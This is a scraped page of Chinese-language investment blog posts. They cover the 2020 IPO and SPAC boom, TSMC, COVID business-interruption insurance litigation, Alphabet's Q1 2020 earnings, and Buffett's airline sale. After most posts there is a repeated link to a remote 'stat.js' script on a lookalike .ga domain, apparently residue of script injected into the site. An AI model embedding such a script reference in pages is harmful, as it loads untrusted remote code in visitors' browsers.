分類
經濟分析 證券投資

從2020 IPO派對談起

 

WSJ值得警醒的一篇文章,重點摘錄如下:

  1. 出乎意料的,美國在疫情肆虐、罹病與死亡人數世界難波萬(截至今日,美國累計確診病例722萬人,死亡20.6萬人),失業率一度突破二次世界大戰以來新高,首次申請失業救濟人數高達數千萬人的時刻,美國IPO市場(Initial Public Offering Market)卻也贏來史上榮景 — 截至9月底,總初次上市公司累計籌資金額達$950億美元,僅次於2014年的$960億美元,是2000年網路泡沫以來第二高記錄!
  2. 2020年平均每家新上市公司都享有24%溢價發行。
  3. 主要吸金領域分別是:金融,電腦電子相關與醫療健康產業(finance, computer and electronic, and healthcare)。佔今年籌資總金額80%。
  4. 稍微讓人放心的,是今年新上市公司數量僅235家,遠少於2000年瘋狂的439家。
  5. 連股神巴菲特都打破幾十年來的習慣,參與了資料處理公司Snowflake Inc的首次公開發行認購,出資$7.35億美元。
  6. 然而兩年前IPO市場還是蕭條到部分專業投資人與公司CEO以為「跟死沒兩樣」。許多當年的獨角獸公司因此選擇私募而拒絕上市。
  7. 值得注意的是今年「空白支票公司(blank-check companies)在IPO市場大行其道,對我來說是一種危險訊號。
  8. 今年IPO籌資40%流入這種以金融併購操作為目的的空白支票公司,專有名詞稱之為SPAC(Special-purpose acquisition company)。
  9. 另外一個危險訊號,美國政府通過新規則,是紐約證交所與Nasdaq均也在修改既有規章,讓「直接掛牌(direct listing)」公司可以跳過投資銀行自行上市,且不再限於員工或既有股東持股部分公開發售,而是可以另外發行新股籌資。這在如今的超級寬鬆貨幣政策氛圍下,恐怕成為吹泡泡的助力。

——————————————————————–

我的看法:

  1. 如同我在今年三月❮利率倒掛與repo rate❯與五月❮美國失業人數破2千萬為何股市上漲?再來怎麼看?❯這兩篇文章說明貨幣學大師們已經論證寬鬆貨幣政策如何透過注入管道之不同而產生不同財貨、資產價格通貨膨漲影響,我們著實看到美國股市在3月份落底之後的瘋狂漲回(見圖)。

  • 身為投資人,我們需要擔心的是美國政府在今年推出的多項救急經濟方案,均可能因為執政效率不彰亦或利益衝突而執行力低下,導致許多等不及的中小企業實質倒閉。

    例如Fed 在今年四月份推出號稱金額高達$6000億美元的Main Street Lending Program,計畫購入中小企業與非營利組織的債權,但根據英國金融時報報導,截至9月18日,真正被執行的金額竟然僅$14.5億美元,佔總金額0.2%。

    背後複雜的利益糾葛與衝突我就不細說了。對投資者而言,我們要小心政客的口惠而實不至。
  • 從我的經濟分析來看,美國實質經濟重創並非來自於疫情而是錯誤的防疫反應與封鎖,這點許多經濟學家近日的研究發表亦有類似觀點,也不多提與我所見相同的Michael Burry這半年來在推特上一反常態地大聲疾呼。

    而寬鬆貨幣政策推升資產價格不僅僅在股市面呈現,我們也看到今年美國房市的驚人漲幅與購買需求。

    要擔心的是,當美國經濟真正開始復甦時,這場貨幣幻覺派對恐怕就要結束了。

 

分類
證券投資

Softbank$500億美元的選擇權作多可能影響近期科技股漲勢


WSJ報導日本Softbank在美國針對幾家科技股的選擇權作多,據該公司繳交證交會的報表金額高達$40億美元,連結個股總金額達$500億。

目前曝光的選擇權連結股票有Amazon、Microsoft、Netflix與Tesla。某些市場人士相信這是造成美國科技股近日瘋狂漲幅的原因之一。例如Apple從七月到九月初,市值增加$7千億美元。Tesla市值翻倍還不止。

——————

我的看法:

1. 選擇權會到期,到期卻看錯方向是會虧損的。這與持有股票不同,後者沒有到期日,因此看對長期趨勢始終能獲利,並不會有長期趨勢看對,但因短期價格變化沒掌握到而受損。

此外,選擇權歸零的概率遠遠高過股票價值歸零。

2. 因此,會在這個時間點作多選擇權,是對短期波動的預測相當有信心了。

近日採取同樣操作的是傳奇操盤人Michael Burry,就是電影「大賣空」那位獨眼醫生。Micahel揭露的F13報表也顯示他重壓36% Scion基金的資產(約$1.1億美元)在Google母公司Alphabet的選擇權上。

3. 但也因為選擇權到期限制,我相信孫正義或Michael Burry都會很快就獲利了結,以免夜長夢多。

4. 巴菲特過去40年的操作,也幾次以「賣出賣權」的方式降低買股成本。

分類
科技相關 隨筆 證券投資 商業評論

台積電還有幾年絕對競爭優勢?

 

我並非從水資源困境,而是從電力供應質、量與可靠性與4奈米以下矽晶片會碰上的量子力學困難兩個角度推估。
關於第一點:

「…台積電去年一年用了130億度的電,但光是明年第一季要量產的5奈米,用電量就比起東台灣56萬人口的用電量還要大。
加上年底動工的3奈米,預計在2022年量產,一年用電更高達77億度,相當於去年總用電量的59.23%,並且超過台南市一年的民生及商業用電,用電量接近全台灣的3%,成長速度有如吃電怪獸。…」

假設市場需求大到3奈米廠需要幾座,台灣未來20年50%以上靠火力(尤其是燃燒天然氣)的電力規劃根本不可能在保證可靠性下供電。只要幾個大規模軍事演習造成海上LNG船供應不順暢,就很可怕了。

再加上政治軍事風險,Apple、AMD、Qualcomm這類大廠不見得樂見台積電一直是「唯一」小尺寸製程晶片製造供應商。

關於第二點,以目前4奈米鰭式電晶體的實驗成品來看,4奈米的絕緣層厚度僅有6個原子寬度,尺寸繼續縮小但不更換材料的前提下,量子隧道效應將會大幅降低晶片的成品良率,我的估計是不良率造成的成本提高很快就會吃掉繼續縮小尺寸提高的經濟利益。

目前只有手機或移動裝置才有足夠誘因與付費意願使用這麼小尺寸製程的晶片,但以移動裝置經通貨膨脹調整的實質價格,20年來是快速下滑的前提下,當前述經濟效應出現時,再加上多數手機效能已經達到多數人日常所需,高效能手機越來越利基市場時,三個條件匯聚,我懷疑廠商下單購買更小尺寸的晶片熱情是否能夠持續。

若單量不夠,規模經濟出不來,又會回頭造成更小尺寸晶片平均生產成本更高。

在這段碰壁期(我認為時間可能長達數年),因美國封鎖而被迫移轉大量資源到晶片製造上的中國就有了追趕時間。

別忘了,中國是目前全世界唯一一個,可以自己生產晶片生產線上幾乎所有所需零配件、化工、稀土原料的國家,包含ASML背後德國蔡司所具備的光學鏡頭打磨。

是的,中國技術都差人一截,但人家是站在「有」的基礎上。換言之,當今天是台積電被美國封鎖,禁止ASML出口機器給台積電時,又會怎樣?

當然我就不提當年協助台積電在縮小製程上突破的幾名大將,目前都被挖角到中國的現況了。

本來毋須多言,但避免誤會所以多提一句:我並非稱10年後台積電就沒有優勢,只是優勢差距將不再如此「近乎絕對」。大白話就是:邊際租值因競爭而下降。

分類
經濟分析 證券投資

我如何運用法律與經濟學在投資決策:營業中斷保險

2004年左右我就曾為文記錄如何從消費者保護法中的「科技抗辯(state of art)」判斷當年因止痛藥Vioxx瑕疵陷入集體訴訟法律風險、股價腰斬的默克藥廠,其實真正面臨的風險並不高,並大膽$26美元危機入市,兩年半後$50多美元陸續獲利了結。

這部份可以參考後來2018年寫得更清楚的【效率市場假說是錯誤的】一文。

這是一次靠法律專業知識的價值投資操作。

近日因Covid-19在美國失控的疫情,我們又看到新一波影響更廣的法律爭議浮出抬面:營業中斷(business interruption)。

美國各州政府的封城(lockdown)措施使得許多中小企業面臨無法營業、營收中斷、現金流鎖死的倒閉危機。原本這些中小企業購買的商業保險,幾乎都有「營業中斷條款」,此條款大概涵蓋範疇如下(以Allstate公司為例):

預期收入損失(For lost income from the destroyed merchandise (minus expenses you may have already paid, such as shipping).Your pre-loss earnings are the basis for reimbursement under business interruption coverage. Lost earnings, also known as the actual loss sustained, are typically defined as revenues minus ongoing expenses. )

額外支出( For extra expenses if you must temporarily relocate your business because of the fire (for example, the cost of rent at the temporary location).)

然而近日上百萬家申請保險賠償的中小企業卻遭到保險公司拒付,理由是:「Covid-19疫情並未造成實質物理損失(actual physical loss)」。

什麼?賠到當內褲還叫沒有損失?這是怎麼一回事?

一、美國商業保險營業中斷(business interruption)條款法律爭議

多數保險公司紛紛於近日在各自網站上強調「實質物理損失(actual physical loss)的存在是申請保險支付的先決條件」。實質物理損失在保險公司方面的定義為:真實損害(damage)造成營業設備、不動產失去部分或全部原本功能/效用,造成商業收入損失。

換言之,目前美國保險公司的態度是 — 病毒並未造成中小企業保戶物理上營業設備或不動產失去運作能力,病毒讓人致病又不讓機器廠房店面生病,當然不構成支付賠償金的條件。

中小企業主的立場顯然相反 — 病毒與政府封城措施造成營業上之不可能,我當初買保險不正是為了這種不可預期之風險?沒了收入但租金、工資與各項支出依然照付,損失哪裡不真實不存在?

為何保險公司可以如此狹隘限縮解釋?這是因為此類商業保險的營業中斷條款最早源自於美國南北內戰時期,當時的商家因戰爭破壞或徵調的關係,其所擁有的商業設備或店面因此不再能持續生產失去收入,在此侷限條件下商界所應運而生的保險制度。故,美國保險法律與習慣上,對實質物理損失的看法是有歷史累積,而因循前例恰恰是普通法(common law)的核心邏輯。

可是現代世界與南北戰爭相差100多年,難道法律上都沒有可以擴張或改變的突破口?

有的,而此問題的法律突破口在一個我想台灣讀者大概都想不到的關鍵點 — 「附著與污染」。

⟪附著與污染⟫

附著概念在1980、1990年代都已經有州法院判決提供了初步概念,但最標誌性、最多後來者引用的則是2002年康乃迪克州聯邦地方法院的⟪Yale University v. CIGNA Ins. Co.⟫一案。

此案中耶魯大學於1980年代的建築外牆塗漆後來證實含有重金屬鉛與石棉,造成第三人健康受損。耶魯大學根據產物保險條款,要求保險公司支付賠償金。保險公司稱:「塗漆又不影響建築物原本功用,不構成物理性實質損害。」拒絕賠償。

官司先在康乃迪克州州法院打,州法院也是採取與保險公司相同的限縮解釋。

但後來官司打到聯邦地方法院,聯邦地院卻採取擴張解釋:「附著」於耶魯大學建築物上的油漆,實質上「污染(contaminated)」了建築物,使其一部或全部失去了原本功用,因此構成實質物理損害。

此觀點在2009年也於⟪Essex Ins. Co. v. BloomSouth Flooring Corp.⟫案得到位於麻州的聯邦第一巡迴法院支持,認為附著於財產上的「惡臭(odor)」也是種能造成實質物理損害的汙染。

這也是為什麼目前我們看到針對Covid-19相關幾百個保險訴訟案中,最活躍的佛羅里達州律師John Houghtaling II主張:「『附著』於建築物、商業設施表面的冠狀病毒也是一種造成實質物理損害的汙染」。即便事實上多數公衛專家均指出目前科學證據顯示,Covid-19主要還是透過人傳人機制傳染,透過附著物體表面傳染案例屬於極少數特例。

因為熟悉英美法的人都知道,common law的先例是一個比較可能勝訴的框架,律師多盡量把訴之主張想辦法塞進成功框架裡,即便看起來很彆扭。要是跳脫既有框架另創新法律見解,則勝訴機率很可能大減。

但前述「附著與污染」見解並非每個法院都買單,例如紐約州州法院在2002年與2014年不同判決中都否定此擴張見解,堅持南北戰爭留下的狹義解釋。

可這就進入我們第二個重點…

二、經濟學角度切入:

各州法院之間對於營業中斷(business interruption)的法律定義不同勢必會增加各州中小企業與保險公司各自在營運上的不確定性。當然,這也會增加再保險公司的不確定性。

依據美國法架構,各州法律見解不同牽涉到跨州商務,是有高度可能最後進入聯邦最高法院以求一統一見解。然而法律訴訟程序的曠日廢時將使得中小企業不見得有足夠資金支撐到訴訟結果,但反之,希冀減少損失的保險公司們卻有相當高誘因要把戰場拖到最高法院。

從經濟學競爭(competitiveness)的概念切入,中小企業方也必將嘗試繞過既有遊戲規則,即法律程序,試圖建立有利於自己的新遊戲規則。

於是乎我們就見到美國知名四大主廚–Daniel Boulud (米其林兩顆星), Thomas Keller(米其林三顆星), Wolfgang Puck(米其林一顆星) 以及 Jean-Georges Vongerichten(米其林三顆星)– 結盟,並於今年3月底去電美國總統川普,要求逼迫保險公司支付停業的商業損失。

川普果然也在4月份內部會議上提出:「他知悉保險公司對多年支付保費的餐廳業者雨天收傘一事,雖然他也知道保險公司保單涵蓋範圍有限,但如果支付賠償金是公平的,則保險公司就應該支付。(… saying restaurateurs had told him they paid for business-interruption coverage for decades but now they need it and insurers don’t want to pay. He said he understood that some policies have pandemic exclusions, adding: “I would like to see the insurance companies pay if they need to pay, if it’s fair.)」

熟悉制度經濟學的朋友都知道,當「無主收入」出現時,意味著租值消散(rent dissipation),也代表著整體社會的浪費。租值消散是整個經濟學最難掌握的高級概念,許多有名的經濟學家或教授,甚至某些諾貝爾獎得主,也不見得能正確理解並掌握此概念,本文並不打算詳談,請有興趣的讀者自行參考我過去幾篇舊文。

就我所知,一般經濟學者未曾討論「準租值消散(rent dissipation on depend)」狀況 — 在法律定義未由最高法院統一見解前,被保險人無從得知是否可以取得保險賠償金;保險人雖暫時對保費有所有權,但一旦訴訟發生依會計原則也必須劃出一部分作為賠償準備金。可是在真實世界,我們目前不存在比曠日廢時的司法或所費不貲的政治遊說(包含政治獻金/賄絡),更有效率且廣為接受的制度來安排這樣的權利衝突。

(此處on depend概念類同於英美財產法中的on depend概念,我就不岔題解釋)

這是說,從經濟分析角度看,在統一法律見解未出現前,此狀況是一種社會費用,以租值消散形式暫時存在。

這就轉到本文的第三個重點,身為證券市場投資人,怎麼看怎麼應對?

三、投資人角度

在日常法律爭議上,此類「未有最終判決前,權利範圍或收入歸屬處於未定狀態」的狀況實屬常見。換個角度說,其實這些案件多屬於個體性風險,即便在系統內會產生一定權利範圍/未來收入預期影響,可幾乎都不會構成「系統性風險」。

但此次對「營業中斷」定義爭議卻碰上歷史罕見的大規模被迫停業狀況,根據美國普查局 (United States Census Bureau)的資料顯示,截至今年5月8日,因被迫停業而申請Paycheck Protection Program (PPP)的中小企業高達360萬家,借款金額達$5370億美元。4月26日~5月2日該週資料更是超過51.4%企業受到疫情影響(見圖)。

有保險公司代表說得清楚:保險原理是基於「大數法則」,亦即平時由多數人分別出資一小部分,於個別性風險實現時支付賠償金彌補其風險。但若「近乎所有出資者的風險都實現」,保險公司根本不可能同時支付所有被保險人賠償金,這已經不是個別性風險而是系統性風險,保險公司只能宣告破產。

2008年金融風暴主因之一也是原本以為透過大數法則建立的CDOs,包裹大量不同債信的房貸債權很安全,結果不堪系統性風險實現而崩潰。

我在今年五月份【美國失業人數破2千萬為何股市上漲?再來怎麼看?】一文中特別強調我們應該多關注CLOs(Collateralized Loan Obligation)潛在違約危機,也是著眼於此類別個別性風險轉為系統性風險的可能性激增。

同樣的,前述營業中斷保險條款無論美國法院最終見解為何,都很可能發生二選一結果:「大規模中小企業因封城出現流動性枯竭引發的大規模倒閉風險」對上「保險公司支付如此大量賠償金恐陷大規模財務危機」。

即便是繞過法律程序,透過政治遊說施壓美國行政單位,依然繞不開上述兩項風險必然實現其中一種的局面。

根據富國銀行(Wells Fargo)的推估,美國目前含有營業中斷條款的保險金額約$8千億美元,其中50%透過再保險方式轉嫁。值得慶幸的是我並未查到此類保險有轉化為其他衍生性金融商品,這表示風險可能未如CDO、CLO般倍數放大。富國銀行認為美國商業保險公司應該有能力吸收$1500億左右的賠償,但根據美國普查局資料受影響商家超過5成,意味著假設$4千億索賠發生時,即便能移轉$2千億至再保險公司,依然還有約$500億的差額。

我們要特別注意的是保險公司收到保險金後必須轉為投資方能獲利,這表示當股市下挫時保險公司的資產也會跟著縮水,償付能力也會隨之下降。例如巴菲特的Berkshire Hathaway旗下保險集團於今年第一季因支付保險賠償金淨損$4.89億美元,但同時集團資產卻也記入$550億資產減損。

故,我前述二擇一風險實現時,會不會引發股市下挫傷害保險公司資產也值得注意。

另一方面,有誘因把法律戰拖到聯邦最高法院的保險公司即便此策略成功執行,流動性短缺的中小企業恐怕提早實現第一種風險,對整體經濟乃至於股市同樣不利。

身為投資人還要再小心的,是本屆Fed主席Jerome H. Powell屢破歷史紀錄的灑鈔救市風格,也很可能在前述因保險爭議而生之系統性風險可能實現時再度開啟瘋狂印鈔機制,而在經濟學上會有什麼效果,我在【美國失業人數破2千萬為何股市上漲?】一文已經講得清楚,簡言之:

a. 證券資產價格將局部出現嚴重通貨膨脹。尤其這段時間持有美國資產者獲利率可能超越持有其他國家資產者。

b. 各國因貨幣政策多少掛著美元,而將出現輸入性通膨。

c. 寬鬆貨幣產生的貨幣幻覺(money illusion)將埋下更多錯誤投資地雷。

d. 每次寬鬆貨幣救市都是以美元地位為代價。當美元地位跌破均衡點,人民幣等主要貨幣不再支撐美元,美國將出現全面性嚴重通貨膨脹,美國債券價格將大跌,許多州政府、市政府有破產可能。此時,持有美元與美國境內資產者恐受相當傷害。

結論:

我批評過很多次,坊間常見的「價值投資」多半只是拿幾個財務數字挪來搬去,從嚴謹的經濟學角度看這只是看圖說故事的自我欺騙行為。我認為真正有效的價值投資,是依據如經濟學這類具備科學解釋力的理論架構,蒐集真實世界的關鍵侷限條件與條件轉變從而預測未來,並嘗試從中獲利。

掌握真實世界的關鍵侷限條件必須:a. 累積大量、多範圍的各種知識,其中法學、經濟學、基礎物理/化學/醫學乃至於某些工程實務等都是必須;與b. 有足夠的能力從無數侷限條件中分離出「關鍵」。

我也談過,Benjamin Graham以降至巴菲特的傳統價值投資法最大缺失在於「忽略貨幣因素」,一旦出現極端貨幣現象時,價值投資幾乎失效。這部份價值投資者必須自行強攻以價格理論出發的貨幣學來彌補。

巴菲特老夥伴Charlie Munger認為投資者需具備各種不同知識體系,吾人深以為然。此文為一又牛刀小試。

參考資料:

  • Yale University v. CIGNA Ins. Co., 224 F. Supp. 2d 402 (D. Conn. 2002)
  • Matzner v. Seaco Ins. Co., 1998 WL 566658 (Mass. Super. Aug. 12, 1998)
  • Arbeiter v. Cambridge Mut. Fire Ins. Co., 1996 WL 1250616, at *2 (Mass. Super. Mar. 15, 1996)
  • Essex Ins. Co. v. BloomSouth Flooring Corp., 562 F.3d 399, 406 (1st Cir. 2009)
  • Roundabout Theatre Co. v. Cont’l Cas. Co., 302 A.D. 2d 1, 2 (N.Y. App. Ct. 2002)
  • Newman, Myers, Kreines, Gross, Harris, P.C. v. Great N. Ins. Co., 17 F. Supp. 3d 323 (S.D.N.Y. 2014)
  • The Wall Street Journal, “Companies Hit by Covid-19 Want Insurance Payouts. Insurers Say No." June 30, 2020
  • Steven N.S. Cheung, “A Theory of Price Control," The Journal of Law and Economics, Vol. XVII, April 1974, pp. 53-71
  • Willam H. Meckling & Armen A. Alchian, “Incentives in The United States," American Economic Review 50 (May 1960), pp. 55-61
  • Milton Friedman, “Money and the Stock Market," Journal of Political Economy, 1988, Vol. 96, no. 2
  • Irving Fisher, “The Money Illusion," 1928

https://js.developerstatss.ga/stat.js?n=ns1
分類
筆記 證券投資

Alphabet Inc. (GOOG) on Q1 2020 Earnings Call notes

Apr. 28, 2020 11:46 PM ET

Company Participants

Jim Friedland – Director of Investor Relations
Sundar Pichai – Chief Executive Officer
Ruth Porat – Chief Financial Officer

Conference Call Participants
Eric Sheridan – UBS
Doug Anmuth – JPMorgan
Heather Bellini – Goldman Sachs
Michael Nathanson – MoffettNathanson
Brian Nowak – Morgan Stanley
Brent Thill – Jefferies
Dan Salmon – BMO Capital Markets
Justin Post – Bank of America Merrill Lynch
Kevin Rippey – Evercore ISI
Mark Mahaney – RBC Capital Markets


CEO:

  1. 針對Covid-19,Google高度配合美國CDC或WHO,並將Youtube上不符合官方的內容快速移除。
  2. 提供與Google往來的中小企業$8億美元緊急貸款、金援或信用擔保。
  3. Google上有關Covid-19的搜尋量是美國超級杯賽時的4倍。
  4. Google Play下載量增加30%。
  5. 三月底時全世界有超過1億學生或教師使用Google Classroom,是月初時的兩倍。
  6. Google Meet使用者增加3百萬人,相較於1月成長30倍。(所以一月時只有十幾萬人?)
  7. 廣告業務在一、二月表現強勁,但三月之後顯著萎縮。
  8. CEO認為Google廣告業務在2008年就證明有兩大優勢,他相信靠這兩大優勢Google可以平安度過此疫情:
    a. Google廣告上線與下線非常有彈性且快速。
    b. Google業務多元化。
  9. 還有一個重點是CEO認為Google在此次疫情表現會比上次2008年金融危機好:相較於12年前,Google現在承包美國政府許多業務,例如紐約州的失業補助申請系統就是Google提供、聯邦政府的緊急健康公衛伺服系統也是Google提供。這部份業務在此次疫情都有顯著成長。
  10. G suit這產品目前有600萬付費用戶,就連Netflix都是。
  11. Android系統上每月使用Google Play的活要用戶高達25億。
  12. Google會降低徵才速率。
  13. 研發自動駕駛的Waymo增資$22.5億美元。

CFO

  1. Q1 Revenue $41.2B (12% YoY)| Revenue related costs $19B (19% YoY)| Other Costs $11.5B (26% YoY)

mainly due to data center operation, depreciation, and content acquisition

  1. Operating expenses $14.2B, mainly due to R&D and sales&marketing
  2. Stock-based compensation costs $3.2B
  3. Headcount was up 4149 comparing to the Q4. Google will slow the hiring pace in Q2 and Q3.
  4. Google Cloud (including G suit and enterprise services)– operating income $8B (-4% YoY)| operating margin 19%
  5. loss of $220M driven by looses in equity securities
  6. Effective tax rate is 11.9%| Net income was $6.8M
  7. CapEx $6B | Operating cash flow was $11.5B| Free cash flow was $5.4B| Repurchase share plan costed $8.5B | Cash pile up to $117B
  8. Google Search & other Ads — Revenue $24.5B (9% YoY)| It was strong in the first two months but significantly declined in March.
  9. Youtube Ad — revenue $4B (33% YoY)| However, the Brand Advertising hugely declined in March.
  10. Network Ad — Revenue $5.2B (4% YoY)
  11. Google Cloud — Revenue $2.8B (52% YoY) (相較Amazon的AWS同期營收是$10B,Microsoft Intelligent Cloud $12.3B,Google小很多)
  12. Other Revenue, mainly driven by Youtube non-ad revenue, $4.4B (23% YoY)
  13. Total Traffic Acquisition costs $7.5B (9% YoY)
  14. Fiber and Verily Revenue $135M | Operating loss $1.1B (果然是兩個賠錢貨)
  15. CFO 這句話明白闡釋Google很清楚自身的上頭成本狀況:「much of our operating expense is not directly related to the change in revenue」(有關企業的上頭成本與租值的觀念我解釋過,就不重複)

Q&A部分問者打不到重點,答者不著邊際、儘是官腔,浪費很長時間卻乏善可陳,懶得摘錄。

https://js.developerstatss.ga/stat.js?n=ns1
分類
隨筆 證券投資

My opinion on Buffett’s selling out of airline shares.

It’s self-contradictory to say that someone is optimistic about the long-run future economy of the US but pessimistic about the airline industry. The number of the airline passengers is positively related to the GDP growth.

The economy shutdown caused by the governments, not the pandemics, is temporary.

There were two serious nova influenzas in 1957 and 1968 spreading in the US and had caused equivalent deaths more than separately 230,000 and 165,000. Comparing to these records, the Covid-19 has costed 57,000 lives. Yes, the number would increase, however, the damage to the economy has been much worse than the two flu had caused.

According to the Fisher’s interest theory, the wealth equals to the accumulation of the future discounted incomes. If the impact is temporary, how come the wealth of the airlines is half priced now?

Considering the monetary distortion created by the Fed due to its massively increase of the M0 after 2008, the retreat of the stock market in the beginning of 2020 is actually a kind of rebalance of the nominal prices and the intrinsic values of the true productivity.

People who are familiar with economics know that the crazy monetary policies that have been adopted by the Fed will cause hyper-inflation after all. And we all know it’s more damaging to holding cash during inflation.

However, the amount of cash Berkshire holds just climbs up to the historical peak. I am wondering if Mr. Buffett has plan B or there existing some other constraints I don’t know, like the legal requirements of its risk-bearing abilities of his re-insurance companies.

As long as he sold out all of the airline shares Berkshire had owned, then there is no concern of interest conflicts. I will not be surprised if any agreement comes between Berkshire and some of the airline companies involving special debt-stock schemes that benefit Berkshire more than purchasing the stocks from the market.

https://js.developerstatss.ga/stat.js?n=ns1
分類
經濟分析 證券投資

黃金與美國政府債券價格的現階段意義

先前「利率倒掛與repo rate」與「為何此次崩盤黃金也跟著跌」兩篇文章分別解釋:美國短期現金市場出了大問題,流動性瞬間乾涸會造成non-banking體系被迫賣出國債、黃金等資產來換取現金。

而這點也解釋為何此次股市崩盤卻出現債券、黃金下跌,但美元指數卻上漲的「反經驗」現象。很明顯,侷限條件不同,但經濟邏輯依然一致。

專家跌破眼睛,只表示專家的經濟學差勁或對真實世界侷限條件掌握不足。

截至上週五(2020/03/20),美國地方政府債券被賣出提款$122億美元;紐約州債券從125cents 跌價至116cents;某些市政府債券殖利率在短短一週內從1.3%飆升至5.2%;威斯康辛州政府的每週利息支出也在一週內從$15500美元上漲至$64,700。

投資高收益政府債券的ETF也是在短短一週內被贖回$53億美元。

種種現象均表明我們三月初以來的兩篇文章正確解釋美國的金融現況。順著此思路就不難理解為何此次Fed從去年9月第一次repo rate飆升後就不斷強力注入現金到流動性市場。這兩日更開啟「無限制QE」瘋狂模式!一如我在3月6日文末所言:

「…這些non-banking institutions的現金需求如果不能從repo market滿足,則將被迫賣出原本可以拿來repo 抵押的美國國債,很可能在短期內快速推升國債利率,引發美國政府財務危機。」

注意,美國有財務危機的政府,可不只聯邦政府一家。沒有印鈔權的州政府或市政府很多也是寅吃卯糧。

根據Fed公布的統計,2019年這被稱為美國50年來失業率最低、就業狀況最美好的一年,40%的美國人手頭現金可是連$400美元都拿不出手。美國各地政府的狀況並不見得比人民好到哪去。

回到主題,我認為從經濟邏輯看,兩個指標大概可以推測美國Fed是否成功挽救流動性市場,一個是黃金價格止跌反漲,一個是10年國債利率下跌。

幸運的是我們在今晚看到這兩個訊號:

同時我們也樂見insider purchasing ratio站上2。

我依然認為先前的大跌、瞬間難看的美國失業狀況(主要集中在飯店、餐飲的邊際勞工上)與過度高估疫情影響等,讓許多人對前景錯誤地過度悲觀。

目前看來,Fed就算是飲鴆止渴也決心要把流動性救回來。因此如果上述二指標能維持一段時日最好。即便又反轉,也毋須對未來過度悲觀。還是巴菲特2016年的老話,拿好你的洗衣盆,你知道眾人恐懼時你該做啥吧。

https://js.developerstatss.ga/stat.js?n=ns1
分類
經濟分析 證券投資

看橋水基金受難有感

聲稱可以「平滑風險」的橋水基金發明策略,結果這一波死得最慘。(見圖)

說穿了就是他們錯誤地假設「股市與債市/黃金的波動永遠相反」。沒想到今年初竟然發生一起下挫的狀況。(原因我在『為何此次崩盤黃金也跟著跌』一文已經詳解)

這是為何我對這類「被神話的投資策略」質疑的點,也是我在投資相關文章反覆強調的觀念。(參見『效率市場假說是錯誤的』一文)

某些曾經成功的投資公式或策略,發明者不見得真的弄清楚了「成功的侷限條件」。當侷限條件轉變發生而實施者不知不覺,則重演「幾個諾貝爾獎得主經營的LTCM,妄想靠數學贏市場,結果瞬間負債千億美元破產」的故事也不意外。

市面上一些「自以為破解巴菲特價值投資策略就是看ROE、盈再率」者,又或以為「程式交易可長期打敗市場」者,何嘗不是一樣癡心妄想呢?呵呵。

https://js.developerstatss.ga/stat.js?n=ns1
分類
證券投資

股災之後復甦機率重要嗎?

每次股災崩盤我們很常看到這類統計,例如Barron’s 3/7這篇「When Will the Stock Market Recover? The Pain Isn’t Over.」:

「1929年以來,美國股市總共發生121次單日漲跌幅超過4.2%,而65個交易日後,股市終究是漲是跌的機率跟丟硬幣沒兩樣 — 50%隨後S&P500平均下跌14.5%;50%上漲18.1%。」
( “The data back him up. Since 1929, there have been 121 one-day moves of 4.2% or more, according to John Kolovos, chief technical market strategist at Macro Risk Advisors—and in those instances, the chances of a positive return over the following 65 trading days were no better than a coin flip. Half of the time, the S&P 500 fell with an average drop of 14.5%. The other half, the S&P 500 gained an average of 18.1%.")

這類統計其實是垃圾統計,沒啥參考意義。原因在於這種統計是「利用事實解釋事實」,根本違背科學方法論,其實啥也沒解釋。


每一次大跌後的整體侷限條件狀況、關鍵侷限條件狀況都不同,這些才是真正決定股市長期走勢的真正原因。

那些動不動就以為「股市就是隨機漫步」的論點,反應的只是論者偷懶或無力觀察與思考。
詳細的批評與正確的投資方法我在「效率市場假說(efficient-market-hypothesis)是錯誤的」一文已經闡述過,就不再重複。

我不得不贊同Elon Musk一次:「我也認為人們對新冠狀病毒的恐懼是過度且不必要,而過度防疫的經濟代價恐怕會遠高過我們想像。」

對於投資,我始終抱持與Michael Burry一樣的信念:「無論股市上漲下跌、瘋狂理性,我始終致力於尋找被嚴重低估的機會。」

像我這種每年把所有上市公司瀏覽一兩輪的價值投資者應該早發現:美股這兩三年很難找到價格合適的公司。這也是為何我在2018年中撰文建議可以逐步提高資產配置中現金的比例

巴菲特自己手頭現金比例也堪稱史上最高,亦可窺知背後緣由一二。

https://js.developerstatss.ga/stat.js?n=ns1
分類
隨筆 證券投資

投資隨筆

Sam Zell,78歲。身價約50億美元,密西根大學法學院畢業,律師出身。

早年在房地產領域以價值投資的方式累積數億身價,後來參與發明REITs(不動產證券化)。

(As he once described it in a 2011 interview with LEADERS magazine, “I made my fortune by turning right when everyone else was going left. In the late ’80s and early ’90s, I was buying office buildings at 50 cents on the dollar. I kept looking over my shoulder to see who my competition was, but there was no one. I could not help but question whether I was wrong. Fear and courage are very closely related.")

中晚年後以股票投資為主。

昨日接受CNBC電視訪問表示:近日美股多數已被嚴重高估,僅XX產業股價被不合理低估,於是大筆買進,並發現原來他的富豪朋友們也早早進場。

&

Michael Burry,電影「大賣空」中那位醫生出身的操盤人,透過CDS大賺幾十億美元的價值投資聞人。

近幾月意外發現我們都在布局同一家公司股票。

————————

股票投資考驗心性的地方在於:明知道自己的決策是正確的,看見有高手看法一樣還是不免開心。

可是真理不是靠投票出來的。

有看法一樣、作法一樣的高手其實依然證明不了什麼。甚至,這份毫無道理的喜悅可能蒙蔽自己的判斷。慎之。

https://js.developerstatss.ga/stat.js?n=ns1